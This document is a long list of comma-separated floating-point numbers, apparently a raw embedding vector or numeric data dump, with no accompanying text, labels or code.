0.018008900806307793, -0.0025921904016286135, 0.0053704227320849895, -0.003964769653975964, -0.0064122602343559265, 0.012659149244427681, 0.0124689731746912, -0.009748619981110096, -0.004270705860108137, 0.02783193811774254, 0.0013963512610644102, -0.023151937872171402, 0.0060608466155827045, 0.009235969744622707, 0.002668674336746335, 0.025417521595954895, 0.014329396188259125, -0.009781694039702415, 0.00859102327376604, -0.01101370807737112, 0.03502557426691055, -0.013825015164911747, -0.023912645876407623, 0.007280457764863968, -0.004708938766270876, 0.0037787272594869137, -0.01451957318931818, -0.021035190671682358, -0.017645085230469704, -0.006862896028906107, 0.002298656851053238, 0.022655826061964035, -0.007400352042168379, -0.014238442294299603, -0.01093929074704647, 0.0015947965439409018, -0.013072577305138111, -0.0021808298770338297, 0.008781199343502522, -0.00858275406062603, 0.00015038425044622272, 0.012593001127243042, 0.01571851223707199, 0.009145015850663185, 0.016322117298841476, -0.027650030329823494, 0.013196605257689953, -0.026707414537668228, 0.012402824126183987, 0.03275999426841736, -0.014461693353950977, 0.025566354393959045, -0.0035162006970494986, 0.008483531884849072, 0.01071604061871767, 0.013767135329544544, 0.005043815355747938, -0.014197099953889847, 0.015883883461356163, 0.008028761483728886, 0.01250204723328352, 0.027881549671292305, 0.00926077552139759, -0.01623116247355938, -0.018190808594226837, 0.009302117861807346, -0.037737660109996796, 0.018091587349772453, -0.009376535192131996, 0.028774552047252655, -0.021316321566700935, -0.03515787422657013, 0.008789468556642532, 0.003586483420804143, 0.023383459076285362, 0.02111787535250187, -0.017198583111166954, -0.008161058649420738, 0.006854627747088671, -0.0040267836302518845, -0.007834450341761112, 0.0066809882409870625, -0.0030510947108268738, -0.0037952642887830734, -0.03949059173464775, -0.009492294862866402, 0.03949059173464775, -0.01407307107001543, 0.02576480060815811, 0.014676675200462341, -0.002199434209614992, 0.031222043558955193, 0.02589709684252739, 0.007528514601290226, 0.018753070384263992, -0.008971376344561577, 0.015809467062354088, 0.005378691479563713, -0.014544378966093063, -0.0034624552354216576, -0.01567717082798481, -0.010815262794494629, 0.01447822991758585, 0.00419008731842041, -0.009781694039702415, -0.03409949690103531, -0.012774908915162086, -0.005019009578973055, -0.0035616776440292597, -0.007007595617324114, 0.017363954335451126, -0.008872153237462044, -0.0017219254514202476, 0.01313872542232275, -0.0026542043779045343, 0.0008464927668683231, 0.005688762292265892, 0.020803671330213547, 0.0292541291564703, -0.0021115809213370085, 0.018455402925610542, -0.003497596364468336, -0.004185953177511692, 0.014304590411484241, -0.0028774552047252655, 0.034661758691072464, 0.006846358999609947, -0.0012692223535850644, 0.008524874225258827, 0.008289220742881298, -0.01523066870868206, 0.0025901230983436108, 0.014304590411484241, 0.021481690928339958, -0.014949537813663483, -0.028394199907779694, 0.008615829050540924, 0.0011979060946032405, 0.013047771528363228, -0.016322117298841476, -0.02425992488861084, 0.01873653382062912, 0.017198583111166954, -0.00842151790857315, -0.003452119417488575, -0.004241765942424536, 0.007135758176445961, -0.011294838972389698, 0.0010966163827106357, -0.024756036698818207, -0.0038758825976401567, -0.041309673339128494, -0.02880762703716755, -0.03829992190003395, 0.01056720595806837, 0.019662611186504364, -0.006821553222835064, 0.004241765942424536, 0.014329396188259125, 0.001513144583441317, 0.0010697436518967152, 0.02657511830329895, 0.011840563267469406, -0.02126671001315117, -0.02030755765736103, -0.008979644626379013, -0.02844380959868431, -0.012237452901899815, 0.024871796369552612, -0.032214269042015076, 0.00041652817162685096, -0.007941941730678082, -0.02941949851810932, -0.003001483390107751, 0.0047172075137495995, 0.0010676764650270343, -0.014304590411484241, -0.008144521154463291, -0.02963448129594326, 0.021250171586871147, 0.011336181312799454, -0.006172472145408392, 0.019017664715647697, 0.004597313702106476, -0.010806994512677193, 0.02591363526880741, -0.015090103261172771, 0.009318655356764793, 0.015569678507745266, -0.03314034640789032, 0.015586216002702713, 0.0016981533262878656, -0.021961268037557602, 0.016628053039312363, -0.0009617356699891388, -0.014941269531846046, 0.0023048582952469587, -0.0014180561993271112, 0.01033568661659956, -0.006304768845438957, 0.00003171763819409534, -0.011766145937144756, -0.019728759303689003, -0.019827982410788536, 0.014767629094421864, 0.025483669713139534, 0.006015369668602943, 0.0016340721631422639, 0.02665780298411846, 0.04097893089056015, 0.03658006340265274, -0.0021518899593502283, -0.004671730566769838, -0.0022283741272985935, -0.007578125689178705, -0.007764168083667755, -0.0023730737157166004, -0.011782683432102203, 0.025334835052490234, 0.005767313297837973, -0.005176112055778503, 0.004221094772219658, 0.03046133741736412, -0.00764840841293335, -0.013982117176055908, -0.03462868556380272, -0.02447490580379963, 0.02045639231801033, -0.004361659754067659, -0.00033694339799694717, 0.011501552537083626, 0.0031895930878818035, 0.010145510546863079, -0.0011048848973587155, 0.012080350890755653, 0.011666923761367798, 0.0042583029717206955, -0.018389254808425903, 0.006565228570252657, 0.038630664348602295, -0.010889680124819279, -0.0012929944787174463, 0.00970727764070034, -0.023846497759222984, 0.004630387760698795, -0.013725792057812214, 0.029353350400924683, -0.003077967558056116, -0.02859264425933361, 0.018637310713529587, -0.007148161064833403, -0.00608151825144887, -0.0005390060832723975, -0.010360492393374443, -0.020654836669564247, -0.003485193708911538, -0.020853282883763313, 0.004928055685013533, -0.0044236741960048676, -0.009839573875069618, -0.005205051973462105, -0.02344960719347, -0.012518583796918392, 0.01676034927368164, 0.008715051226317883, -0.002619063016027212, -0.01526374276727438, -0.02559942938387394, 0.006862896028906107, 0.019596463069319725, 0.011228689923882484, 0.007044804282486439, -0.021002115681767464, -0.005754910409450531, -0.010459715500473976, 0.006999327335506678, -0.008442189544439316, 0.0002754460438154638, 0.01654536835849285, 0.039523668587207794, -0.0026045930571854115, 0.01037702988833189, 0.004223161842674017, -0.004403002560138702, 0.01867038570344448, -0.006854627747088671, 0.014660138636827469, 0.010558937676250935, -0.019877593964338303, 0.009037524461746216, 0.022887345403432846, 0.0013043637154623866, -0.0054489742033183575, 0.019960278645157814, 0.0007384848431684077, -0.015726780518889427, -0.015329890884459019, 0.011956322938203812, -0.021150950342416763, 0.006230351980775595, -0.01688437908887863, 0.005552330985665321, -0.013452930375933647, -0.0059120128862559795, 0.002490900456905365, 0.00896310806274414, -0.0032412714790552855, 0.0016051321290433407, -0.024656815454363823, 0.010509326122701168, -0.011989396996796131, 0.0000932149778236635, -0.04289723560214043, -0.005184380803257227, -0.006999327335506678, 0.023995330557227135, 0.0012650880962610245, 0.007904733531177044, -0.02090289257466793, 0.021465154364705086, -0.010319150052964687, 0.00004980509038432501, -0.016404801979660988, 0.0019658475648611784, -0.027005081996321678, 0.04319490119814873, 0.0006454636459238827, 0.021779360249638557, 0.019679147750139236, 0.02126671001315117, 0.033338792622089386, -0.003999910783022642, 0.010517595335841179, -0.03853144124150276, -0.011666923761367798, -0.0025611831806600094, -0.019877593964338303, 0.011303107254207134, 0.008214804343879223, 0.005544062703847885, 0.009690740145742893, 0.021828969940543175, 0.014759360812604427, -0.027650030329823494, -0.01709936000406742, 0.024078017100691795, 0.037274621427059174, 0.004291377030313015, 0.010195121169090271, 0.0038800169713795185, 0.0035596105735749006, -0.0013198672095313668, 0.0297006294131279, -0.009533637203276157, -0.009798231534659863, -0.0034748578909784555, -0.007776570972055197, 0.014345933683216572, -0.012791446410119534, -0.007966747507452965, 0.008516605943441391, 0.0033818366937339306, 0.018157735466957092, 0.039523668587207794, -0.016479218378663063, -0.037506140768527985, -0.03581935539841652, -0.0113527188077569, 0.0019276055973023176, -0.001608232851140201, -0.0011265898356214166, -0.027650030329823494, -0.00395650090649724, 0.003623691853135824, -0.020919431000947952, 0.0034769251942634583, -0.021068263798952103, -0.012196110561490059, -0.028840700164437294, 0.0113527188077569, -0.008987913839519024, 0.0017963424324989319, -0.017562398687005043, -0.0010697436518967152, -0.002308992436155677, -0.0022800525184720755, 0.016727276146411896, 0.0031937272287905216, -0.0029105294961482286, -0.014957806095480919, -0.00451462808996439, -0.014602258801460266, -0.0024061480071395636, -0.024574128910899162, 0.023829959332942963, 0.01948070339858532, -0.0022841868922114372, -0.00331155420280993, -0.0032412714790552855, -0.00902925617992878, -0.0005333214648999274, -0.004097066354006529, -0.01718204654753208, 0.02672395296394825, -0.021167486906051636, -0.013750597834587097, -0.033934127539396286, -0.013626569882035255, 0.02693893387913704, -0.019877593964338303, 0.022887345403432846, 0.0009188425610773265, -0.03704310208559036, 0.024078017100691795, 0.0033260241616517305, 0.002838179701939225, 0.022556602954864502, 0.008508337661623955, -0.006714062299579382, -0.02156437747180462, -0.027286212891340256, -0.008433920331299305, 0.017115898430347443, 0.006581765599548817, -0.006325440481305122, 0.0009338293457403779, -0.027368899434804916, 0.013866357505321503, 0.000506448675878346, -0.01056720595806837, -0.018620774149894714, 0.007082012481987476, 0.01867038570344448, -0.011402329429984093, 0.007813779637217522, -0.012741834856569767, 0.0016609448939561844, 0.02096904255449772, 0.006590033881366253, 0.005697030574083328, 0.021465154364705086, 0.02141554281115532, 0.009169821627438068, 0.004049522336572409, 0.028096530586481094, -0.004655193537473679, -0.01718204654753208, -0.0033322253730148077, 0.01567717082798481, -0.011476746760308743, 0.007739362306892872, 0.009409609250724316, 0.0054117655381560326, 0.012551657855510712, 0.003727048635482788, 0.010087630711495876, -0.0010433875722810626, -0.03906062990427017, 0.0030883033759891987, 0.005705299321562052, 0.010294344276189804, 0.008239609189331532, 0.004303779918700457, 0.0038738155271857977, -0.0006470140069723129, 0.01175787765532732, -0.017876604571938515, -0.007350740488618612, 0.023383459076285362, 0.016198089346289635, -0.004194221924990416, 0.012419361621141434, 0.007115087006241083, 0.012807982973754406, 0.0026790101546794176, 0.004241765942424536, -0.008599291555583477, 0.016181550920009613, 0.003216465702280402, -0.01731434278190136, -0.013742329552769661, -0.0138084776699543, -0.029072219505906105, -0.005279468838125467, -0.004808161407709122, 0.0060608466155827045, -0.0025591161102056503, 0.0037456529680639505, -0.005816924851387739, -0.002118815900757909, -0.013502540998160839, 0.00024288863642141223, -0.022523529827594757, -0.013312364928424358, 0.010922754183411598, 0.017496250569820404, -0.009756888262927532, -0.00028474818100221455, -0.003307419829070568, 0.023333847522735596, 0.0141805624589324, 0.0043823313899338245, -0.01601617969572544, -0.017529325559735298, 0.010815262794494629, 0.015577947720885277, -0.015346428379416466, -0.01654536835849285, -0.0019224378047510982, 0.00680915080010891, -0.033256106078624725, -0.018686922267079353, -0.0015751586761325598, -0.02111787535250187, 0.002242844086140394, 0.016305578872561455, 0.0017591338837519288, -0.018389254808425903, 0.009947065263986588, 0.0005849998560734093, 0.0023606708273291588, -0.001839752309024334, 0.016404801979660988, 0.0048412359319627285, -0.0036567661445587873, -0.04180578514933586, 0.012419361621141434, -0.005510988179594278, 0.014089608564972878, -0.006164203863590956, 0.01250204723328352, -0.009302117861807346, -0.008715051226317883, -0.007557454518973827, 0.0009736217325553298, 0.0049900696612894535, -0.038399145007133484, -0.011162541806697845, -0.015644095838069916, -0.006284097675234079, 0.03522402048110962, -0.0031565187964588404, -0.02521907538175583, -0.0015007416950538754, -0.0038324727211147547, 0.009169821627438068, 0.01971222274005413, 0.020654836669564247, -0.007660811301320791, 0.0005105829332023859, 0.015073565766215324, 0.0001937941269716248, 0.00024211347044911236, 0.013386781327426434, 0.015470456331968307, 0.0009901587618514895, -0.012667417526245117, -0.0033880381379276514, 0.005544062703847885, 0.003129645949229598, 0.01462706457823515, -0.026889322325587273, -0.004828833043575287, 0.018984589725732803, 0.004977666772902012, 0.017578937113285065, 0.007747631054371595, -0.00047699196147732437, -0.003729115938767791, 0.0016154678305611014, 0.0028154412284493446, 0.0016526763793081045, -0.036910805851221085, -0.026823174208402634, 0.01718204654753208, 0.02313540130853653, -0.0008134185918606818, 0.0006129062385298312, -0.019679147750139236, -0.008057701401412487, 0.0013198672095313668, 0.005362154450267553, -0.01007109321653843, 0.040119003504514694, 0.014792434871196747, 0.0029539393726736307, -0.008930033072829247, -0.013709255494177341, -0.02149822935461998, -0.015652364119887352, -0.002701748628169298, 0.0028836566489189863, -0.021399006247520447, -0.005341482814401388, 0.002616995945572853, 0.0005710467230528593, -0.0022655825596302748, -0.005527525208890438, 0.02665780298411846, 0.0006191076245158911, 0.013667912222445011, 0.015354696661233902, -0.009037524461746216, -0.010501057840883732, 0.00029921813984401524, 0.02948564849793911, -0.008466994389891624, -0.0035740805324167013, -0.01522239949554205, 0.007466500159353018, 0.004020582418888807, -0.00479575851932168, -0.008756393566727638, 0.000668718945235014, -0.008144521154463291, 0.007127489894628525, 0.002949804998934269, 0.008305758237838745, -0.021002115681767464, 0.04104508087038994, 0.006449468433856964, -0.01361830160021782, -0.028460348024964333, -0.006838090717792511, -0.007152295205742121, -0.014618795365095139, 0.008690245449543, 0.007594662718474865, -0.004936323966830969, -0.004642790649086237, -0.019612999632954597, 0.009153284132480621, -0.01608232967555523, 0.011964591220021248, 0.014362470246851444, 0.01451957318931818, 0.035422466695308685, -0.011021976359188557, 0.005998832639306784, -0.01361830160021782, 0.005883072968572378, -0.025285225361585617, -0.011766145937144756, 0.015205862931907177, 0.011245227418839931, 0.017860066145658493, -0.01340331882238388, 0.0041921548545360565, 0.02693893387913704, -0.0020898759830743074, -0.009087136015295982, 0.005618479568511248, -0.0160988662391901, -0.0016071993159130216, 0.005593673791736364, 0.01888536661863327, -0.01310565136373043, 0.0012175439624115825, 0.0066437795758247375, -0.02536791004240513, -0.027451584115624428, -0.0013953177258372307, -0.010062824934720993, -0.009723814204335213, -0.018025437369942665, 0.011658654548227787, 0.012121693231165409, 0.000858378829434514, 0.026260914281010628, 0.0119480537250638, 0.02043985389173031, -0.01805851235985756, 0.011476746760308743, -0.01682649925351143, 0.018174272030591965, 0.008896959014236927, 0.005415900144726038, -0.025186002254486084, -0.010558937676250935, -0.02336692065000534, -0.015983106568455696, 0.005023143719881773, 0.014792434871196747, 0.009616322815418243, 0.02642628364264965, -0.001547252293676138, -0.01552833616733551, 0.012072082608938217, -0.0012061747256666422, 0.020423317328095436, 0.015181057155132294, -0.005196783225983381, -0.015172788873314857, -0.01954685151576996, 0.022490454837679863, -0.0062220836989581585, 0.019001126289367676, -0.016685932874679565, 0.0045270309783518314, 0.016983600333333015, 0.012551657855510712, 0.003584416350349784, 0.01489165797829628, 0.011774414218962193, -0.011997665278613567, 0.01971222274005413, -0.015437382273375988, 0.013486004434525967, -0.015685439109802246, -0.0009250440052710474, -0.011170810088515282, -0.013320633210241795, -0.01451957318931818, 0.015040491707623005, 0.023763811215758324, -0.0015782593982294202, -0.0026480029337108135, -0.0014211569214239717, -0.000029585904485429637, 0.001608232851140201, 0.012411093339323997, -0.022110100835561752, 0.010087630711495876, 0.012667417526245117, 0.01962953619658947, -0.004241765942424536, 0.0022221726831048727, 0.005982295610010624, -0.01067469734698534, -0.004440211225301027, -0.010732577182352543, 0.007528514601290226, 0.028245365247130394, 0.0018759272061288357, 0.00839257799088955, 0.015040491707623005, 0.003948232624679804, -0.004349256865680218, 0.010773920454084873, -0.0008418416837230325, -0.00293946941383183, -0.0012826587771996856, -0.004357525613158941, 0.002259381115436554, 0.008438054472208023, 0.0023399994242936373, 0.0037890628445893526, 0.002257314044982195, 0.02731928788125515, -0.011485015042126179, -0.00298701343126595, -0.012287064455449581, -0.003075900487601757, -0.027352362871170044, -0.018637310713529587, -0.0023999465629458427, 0.01332890149205923, 0.00412600627169013, -0.010856605134904385, -0.004564239177852869, 0.011997665278613567, 0.002701748628169298, -0.0013839484890922904, 0.00020128750475123525, 0.002073338720947504, -0.00888869073241949, -0.004485688172280788, 0.0015141781186684966, 0.01571851223707199, 0.01273356657475233, 0.005957489833235741, -0.016388265416026115, 0.005205051973462105, -0.020357169210910797, -0.0065197511576116085, 0.014668406918644905, 0.006511482875794172, -0.00680915080010891, -0.00902925617992878, 0.011989396996796131, 0.001997888321056962, -0.00535388570278883, 0.014800704084336758, 0.0016423406777903438, 0.013361976481974125, -0.03585243225097656, 0.0006439132848754525, -0.019381480291485786, 0.0006852560327388346, 0.0018480208236724138, -0.008690245449543, 0.02134939469397068, 0.003135847393423319, 0.011303107254207134, 0.003272278467193246, 0.010261270217597485, -0.00785098783671856, -0.004485688172280788, -0.016983600333333015, 0.0003888802311848849, -0.014933000318706036, 0.0021456885151565075, 0.01926572062075138, 0.012584732845425606, -0.0008485598955303431, 0.018339643254876137, 0.011526358313858509, -0.006668585352599621, -0.013370244763791561, -0.0036691688001155853, -0.0019255385268479586, -0.007826182059943676, -0.001729160430841148, 0.004729610402137041, 0.010906216688454151, 0.0027472255751490593, 0.0036174904089421034, -0.02179589681327343, 0.01168346032500267, -0.004696536343544722, 0.01303123403340578, -0.0037435858976095915, 0.013560420833528042, 0.006416394375264645, -0.011584238149225712, 0.009211163967847824, -0.004688267596065998, 0.008065969683229923, -0.005184380803257227, -0.01948070339858532, -0.018604235723614693, -0.009037524461746216, -0.009550174698233604, -0.002571518998593092, 0.021365931257605553, 0.0013446728698909283, 0.005808656103909016, -0.005498585291206837, 0.009475757367908955, 0.004622119013220072, 0.013444661162793636, -0.008090775460004807, 0.005254663061350584, 0.012245722115039825, 0.010054556652903557, 0.008041164837777615, 0.020125649869441986, 0.002437154995277524, -0.023648051545023918, -0.010104167275130749, -0.007086147088557482, -0.00003656249100458808, 0.00043358205584809184, 0.005453108344227076, 0.0026790101546794176, -0.011055050417780876, 0.019877593964338303, 0.012262258678674698, -0.020770596340298653, 0.004911518655717373, 0.006151800975203514, 0.00014650836237706244, -0.020274482667446136, -0.011195615865290165, 0.024722963571548462, 0.0021250173449516296, -0.017297806218266487, 0.015437382273375988, 0.003305352758616209, -0.002532243262976408, -0.026972008869051933, 0.027368899434804916, 0.0075243799947202206, -0.004378196783363819, -0.02793116122484207, 0.004506359342485666, 0.002794769825413823, 0.011625580489635468, 0.00045451184269040823, 0.005362154450267553, -0.0167851559817791, 0.03209850937128067, -0.014197099953889847, 0.02120056189596653, 0.011501552537083626, 0.0024991692043840885, 0.01578466035425663, 0.013940774835646152, 0.02940296195447445, 0.004431942477822304, 0.014379007741808891, 0.010137241333723068, -0.019612999632954597, 0.012675686739385128, -0.007156429812312126, -0.013601764105260372, -0.020291021093726158, -0.003491395153105259, 0.02530176192522049, 0.018554626032710075, -0.00505621824413538, 0.00407846225425601, 0.0012537188595160842, 0.014263248071074486, 0.027038156986236572, 0.01041010394692421, -0.0018666250398382545, 0.020853282883763313, -0.013320633210241795, -0.017066286876797676, 0.018901905044913292, 0.013229679316282272, -0.006317171733826399, -0.0051140980795025826, 0.008880422450602055, 0.014048265293240547, -0.005548196844756603, -0.0023193282540887594, -0.010393566451966763, -0.007367277517914772, 0.012932011857628822, 0.00692077586427331, -0.014379007741808891, 0.019017664715647697, -0.0033466953318566084, -0.006689256522804499, -0.014395545236766338, 0.010385298170149326, 0.006387454457581043, 0.010600280947983265, 0.012981622479856014, 0.0073714121244847775, 0.01964607462286949, -0.0017674025148153305, 0.00449809106066823, -0.01688437908887863, -0.006544556934386492, -0.006292366422712803, -0.01837271638214588, 0.0045270309783518314, 0.0056391507387161255, 0.008132118731737137, 0.028493421152234077, -0.0013188336743041873, 0.0007772436365485191, -0.03694387897849083, -0.0019183035474270582, -0.0027492926456034184, 0.002116748597472906, -0.014403813518583775, 0.004059857688844204, 0.010385298170149326, 0.005792119074612856, -0.0009265943081118166, 0.018637310713529587, 0.0006165237282402813, -0.0002232508413726464, -0.013395050540566444, -0.014949537813663483, -0.00014573318185284734, -0.004932189825922251, -0.0021250173449516296, 0.016255969181656837, 0.02321808785200119, 0.011377524584531784, 0.013287559151649475, 0.0043823313899338245, -0.00027312053134664893, -0.023350384086370468, -0.00196998193860054, -0.006941447500139475, 0.005792119074612856, -0.015437382273375988, -0.0052587976679205894, 0.005593673791736364, -0.007003461476415396, 0.0011999732814729214, -0.012270527891814709, 0.021895119920372963, 0.030428262427449226, 0.017231658101081848, -0.006131129339337349, 0.012311870232224464, 0.008863884955644608, 0.00966593436896801, -0.016628053039312363, 0.00804943311959505, 0.003024222096428275, 0.00036924242158420384, 0.01407307107001543, -0.0327930673956871, 0.012526853010058403, 0.011881905607879162, 0.004336854442954063, -0.020638300105929375, 0.004692401736974716, -0.0020051233004778624, -0.009227701462805271, -0.0066851223818957806, -0.012568195350468159, 0.024524517357349396, -0.012783177196979523, -0.006805016193538904, -0.006842224858701229, 0.00707374420017004, -0.010583743453025818, -0.00039043056312948465, -0.0069125075824558735, -0.020952504128217697, -0.006023638416081667, 0.00936826691031456, -0.007342472206801176, 0.010699503123760223, -0.005010740831494331, 0.009252507239580154, -0.030329039320349693, 0.006300634704530239, 0.003204063046723604, 0.027782326564192772, -0.011691729538142681, -0.00787992775440216, 0.012824520468711853, 0.013320633210241795, -0.004390599671751261, 0.013262753374874592, -0.011435404419898987, -0.009161553345620632, -0.01880268193781376, -0.02447490580379963, 0.005887207109481096, -0.004890847019851208, -0.0021911656949669123, -0.0028733210638165474, -0.006217949092388153, 0.0016630120808258653, 0.014560915529727936, -0.013692717999219894, -0.019910667091608047, 0.007673214189708233, 0.030940912663936615, 0.002898126607760787, -0.0048660412430763245, -0.004419539589434862, 0.027865011245012283, -0.011699997819960117, -0.016537098214030266, -0.009980139322578907, -0.02194473147392273, -0.01078218873590231, -0.001153462682850659, -0.011319644749164581, -0.009211163967847824, -0.011699997819960117, 0.01682649925351143, 0.028460348024964333, 0.0057218363508582115, 0.00046458913129754364, 0.012576463632285595, -0.008214804343879223, -0.010798725299537182, -0.022358158603310585, -0.01317179948091507, 0.012526853010058403, 0.01444515585899353, -0.009252507239580154, 0.004477419424802065, 0.023052716627717018, -0.011824025772511959, -0.008264414966106415, 0.005961624439805746, 0.005432437174022198, 0.024243386462330818, 0.020274482667446136, -0.003317755414173007, -0.01784352958202362, 0.0013126322301104665, -0.02098557911813259, -0.017231658101081848, -0.013146993704140186, 0.0029084624256938696, 0.003543073544278741, -0.0013798142317682505, -0.005052083637565374, -0.010658160783350468, -0.012303601950407028, 0.019612999632954597, 0.022821197286248207, 0.03342147916555405, 0.026608193293213844, 0.008681977167725563, -0.008413249626755714, 0.008648903109133244, 0.01593349501490593, -0.0037125786766409874, 0.0017177911940962076, 0.0009591517737135291, 0.010054556652903557, 0.007499574683606625, 0.009277313016355038, 0.00858275406062603, 0.014908194541931152, -0.006556959822773933, -0.022374695166945457, -0.014312859624624252, -0.0006284097908064723, -0.002298656851053238, 0.004001977853477001, 0.02746812254190445, 0.0002130443463101983, 0.012568195350468159, -0.011112930253148079, -0.007032401394098997, 0.010253001004457474, -0.019596463069319725, -0.016024449840188026, 0.0010268505429849029, -0.027220064774155617, 0.03211504593491554, -0.025285225361585617, -0.0004446929378900677, 0.005200917832553387, -0.005668090656399727, -0.005957489833235741, -0.019464164972305298, -0.030560558661818504, -0.00451462808996439, 0.0009493328398093581, 0.016685932874679565, 0.0021932327654212713, 0.0074416943825781345, -0.006019504275172949, -0.008896959014236927, 0.001337437890470028, 0.00355340912938118, -0.020423317328095436, -0.008715051226317883, 0.02725313976407051, 0.015611021779477596, 0.013163531199097633, 0.013279290869832039, 0.009128478355705738, -0.01351081021130085, 0.019447628408670425, 0.008024627342820168, 0.023995330557227135, 0.0039627025835216045, -0.010120704770088196, -0.007421023212373257, -0.007805510889738798, -0.013576958328485489, 0.006007101386785507, -0.007528514601290226, -0.02432607300579548, -0.000012168656212452333, 0.01556141022592783, 0.012915474362671375, -0.0022697169333696365, 0.013279290869832039, 0.02874147891998291, -0.002865052316337824, -0.009376535192131996, -0.023697663098573685, -0.022936956956982613, -0.014197099953889847, 0.009541906416416168, -0.003681571688503027, 0.017281267791986465, -0.010178584605455399, -0.020572151988744736, -0.005982295610010624, 0.017132434993982315, 0.016065791249275208, -0.013279290869832039, -0.007115087006241083, -0.010459715500473976, 0.024739500135183334, 0.02014218643307686, -0.0013178001390770078, -0.032214269042015076, -0.020109113305807114, 0.003929628059267998, -0.0010418372694402933, 0.012072082608938217, -0.0276169553399086, -0.00918635819107294, -0.01590869016945362, -0.0015348495217040181, -0.0024764304980635643, 0.0021498228888958693, 0.01708282344043255, -0.014205368235707283, -0.017661621794104576, 0.005961624439805746, -0.004878444131463766, -0.013345438987016678, 0.006743002217262983, -0.014899926260113716, 0.02090289257466793, -0.010294344276189804, 0.01709936000406742, 0.004169416148215532, 0.019166497513651848, 0.005651553627103567, 0.009947065263986588, -0.024160701781511307, 0.004874309990555048, 0.0014345933450385928, -0.0038738155271857977, -0.016140209510922432, -0.0026996813248842955, -0.0038221371360123158, -0.005796253215521574, -0.016305578872561455, 0.014023460447788239, 0.0017787717515602708, 0.008446323685348034, 0.010740845464169979, -0.0040701935067772865, 0.012882400304079056, -0.0020154588855803013, -0.011972859501838684, 0.013659643940627575, 0.006040175445377827, 0.008566217496991158, -0.013320633210241795, 0.00710681825876236, -0.013692717999219894, 0.014974343590438366, 0.03320649638772011, 0.0037456529680639505, 0.0008697480661794543, -0.01003801915794611, 0.0289564598351717, -0.02134939469397068, 0.007325934711843729, 0.013378513045608997, 0.025417521595954895, -0.03800225257873535, 0.0015555209247395396, 0.021084802225232124, 0.02351575531065464, -0.00395650090649724, -0.01820734702050686, -0.03763843700289726, 0.0055316598154604435, 0.009732082486152649, -0.012402824126183987, -0.03343801572918892, 0.013452930375933647, -0.004845370072871447, -0.02740197256207466, -0.017661621794104576, 0.017529325559735298, 0.0019172698957845569, -0.015842540189623833, 0.0003609738778322935, -0.011460209265351295, 0.008475263603031635, 0.022126639261841774, 0.009517100639641285, 0.008690245449543, 0.0007514044409617782, -0.0016464749351143837, -0.004692401736974716, 0.0014159891288727522, 0.020357169210910797, 0.004099133424460888, 0.018091587349772453, 0.01731434278190136, -0.017876604571938515, 0.004035052377730608, 0.02217625081539154, 0.002805105410516262, 0.009120210073888302, 0.03413257375359535, 0.011832294054329395, 0.004287242889404297, -0.003948232624679804, 0.009823037311434746, 0.01093929074704647, -0.010699503123760223, -0.013750597834587097, 0.000714195950422436, -0.025731725618243217, 0.01414748840034008, -0.00028448979719541967, 0.016470950096845627, -0.015015685930848122, 0.005415900144726038, -0.011360987089574337, -0.004911518655717373, 0.0025942574720829725, 0.007549185771495104, -0.04679999127984047, -0.004074327647686005, -0.001636139233596623, -0.01441208180040121, 0.01011243648827076, -0.023052716627717018, -0.001725026173517108, -0.002393745118752122, -0.018008900806307793, -0.011774414218962193, -0.01078218873590231, -0.036910805851221085, -0.004254168830811977, 0.004617984872311354, 0.010517595335841179, -0.01792621612548828, 0.010757382959127426, -0.024756036698818207, -0.011741340160369873, -0.016437876969575882, 0.004223161842674017, -0.011675192043185234, 0.0018562893383204937, 0.013998654671013355, -0.004181819036602974, 0.0026872786693274975, -0.022424306720495224, 0.0030221547931432724, -0.0070199985057115555, 0.004613850731402636, 0.00895483884960413, -0.013519078493118286, 0.0010966163827106357, -0.006375051569193602, 0.0008454591734334826, -0.02366458810865879, -0.004274840001016855, -0.004183886107057333, 0.027435047551989555, 0.02746812254190445, 0.009359997697174549, 0.01070777140557766, -0.01746317744255066, -0.014172294177114964, 0.00335082970559597, -0.006213814951479435, -0.0028237097430974245, -0.007516111712902784, -0.009856111370027065, 0.013568690046668053, -0.0249379463493824, 0.00035089656012132764, 0.022077027708292007, -0.021828969940543175, -0.0002767380210570991, 0.01216303650289774, -0.02606246806681156, -0.0011689661769196391, 0.025136390700936317, -0.0047585503198206425, 0.021994341164827347, 0.0019379412988200784, -0.008202400989830494, -0.011055050417780876, -0.0031048404052853584, 0.015329890884459019, 0.0049073840491473675, -0.011848831549286842, -0.008276818320155144, -0.017231658101081848, 0.0003710511664394289, -0.0031420488376170397, 0.01895151473581791, -0.012816252186894417, 0.012543389573693275, 0.017380490899086, -0.0014986746245995164, -0.013725792057812214, -0.0042583029717206955, -0.002006156835705042, 0.0026025259867310524, 0.009178089909255505, -0.010104167275130749, 0.005891341716051102, 0.02434260956943035, 0.016289042308926582, -0.006900104694068432, 0.01340331882238388, 0.019447628408670425, -0.004849504213780165, -0.004878444131463766, 0.011699997819960117, -0.021399006247520447, -0.016776887699961662, -0.010434909723699093, -0.0015658566262573004, -0.00352860358543694, -0.015032223425805569, 0.011435404419898987, 0.012617806904017925, 0.002852649660781026, 0.006189009174704552, -0.00377045851200819, 0.003092437516897917, -0.015520067885518074, 0.009574980475008488, 0.008235475048422813, -0.008289220742881298, 0.020770596340298653, -0.014676675200462341, 0.0014542312128469348, -0.01414748840034008, 0.002488833386451006, 0.00969900842756033, 0.018091587349772453, -0.008607559837400913, 0.010228196159005165, 0.0029663422610610723, -0.01629731059074402, -0.005047949496656656, 0.0012981622712686658, -0.005978161469101906, 0.0036154233384877443, -0.02462374046444893, 0.01242762990295887, 0.016404801979660988, 0.0010454547591507435, 0.02695547230541706, -0.015354696661233902, -0.013535615988075733, 0.006193143781274557, 0.00078137795208022, -0.00029585903394035995, 0.012898936867713928, -0.015462188050150871, -0.015280279330909252, 0.004626253619790077, 0.0048660412430763245, -0.0023999465629458427, -0.008094909600913525, 0.015966570004820824, -0.012890668585896492, 0.026905860751867294, -0.01739702746272087, -0.02462374046444893, -0.001287826569750905, -0.01048452127724886, 0.012650880962610245, 0.023631514981389046, 0.00017777382163330913, 0.001003078417852521, 0.024838723242282867, -0.007598796859383583, 0.00011621187877608463, 0.0073342034593224525, 0.0010945491958409548, 0.015404308214783669, -0.0027451585046947002, -0.004894981160759926, 0.0019989218562841415, -0.003588550491258502, -0.0021849642507731915, 0.021977804601192474, 0.0002135611284757033, -0.011600774712860584, -0.0018273494206368923, -0.01489165797829628, 0.03127165511250496, -0.02485525980591774, 0.0051554408855736256, -0.013072577305138111, 0.009649397805333138, -0.0061393980868160725, -0.002346200868487358, -0.02202741615474224, -0.01608232967555523, -0.008065969683229923, 0.0021684272214770317, -0.008041164837777615, 